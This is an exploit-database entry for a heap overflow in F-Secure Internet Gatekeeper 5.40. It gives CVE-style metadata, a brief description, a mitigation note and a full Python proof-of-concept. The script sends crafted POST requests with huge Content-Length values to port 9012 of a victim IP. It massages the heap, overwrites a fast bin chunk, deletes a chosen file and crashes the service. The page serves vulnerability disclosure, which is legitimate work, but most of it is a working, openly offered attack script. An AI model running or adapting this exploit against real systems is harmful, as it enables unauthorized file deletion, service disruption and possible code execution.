F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)

vendor:

Internet Gatekeeper

by:

Kevin Joensen

7.5

CVSS

HIGH

Heap Overflow

122

CWE

Product Name: Internet Gatekeeper

Affected Version From: 5.40

Affected Version To: 5.40

Patch Exists: YES

Related CWE: N/A

CPE: a:f-secure:internet_gatekeeper

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2020

F-Secure Internet Gatekeeper 5.40 – Heap Overflow (PoC)

This exploit is a proof-of-concept for a heap overflow vulnerability in F-Secure Internet Gatekeeper 5.40. The vulnerability is triggered by sending a specially crafted POST request with a large Content-Length header. This causes a heap overflow, which can be used to overwrite a fast bin chunk and gain code execution. The exploit was discovered by Kevin Joensen and detailed in a blog post by Doyensec.

Mitigation:

F-Secure has released a patch for this vulnerability. Users should update to the latest version of F-Secure Internet Gatekeeper to protect against this vulnerability.

Source

Exploit-DB raw data:

# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
# Date: 2020-01-30
# Author: Kevin Joensen
# Vendor: F-Secure
# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
# CVE: N/A
# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A"* 488             # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
        print "Trying to massage the heap....."
        for x in xrange(100):
            payload = ""
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
            payload += filename + "\x00"
            payload += "C"*(0x300-len(payload))
            r = send_payload(payload, content_len=0x80000, nofun=True)
            r.close()
            cut_conn = True
        print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])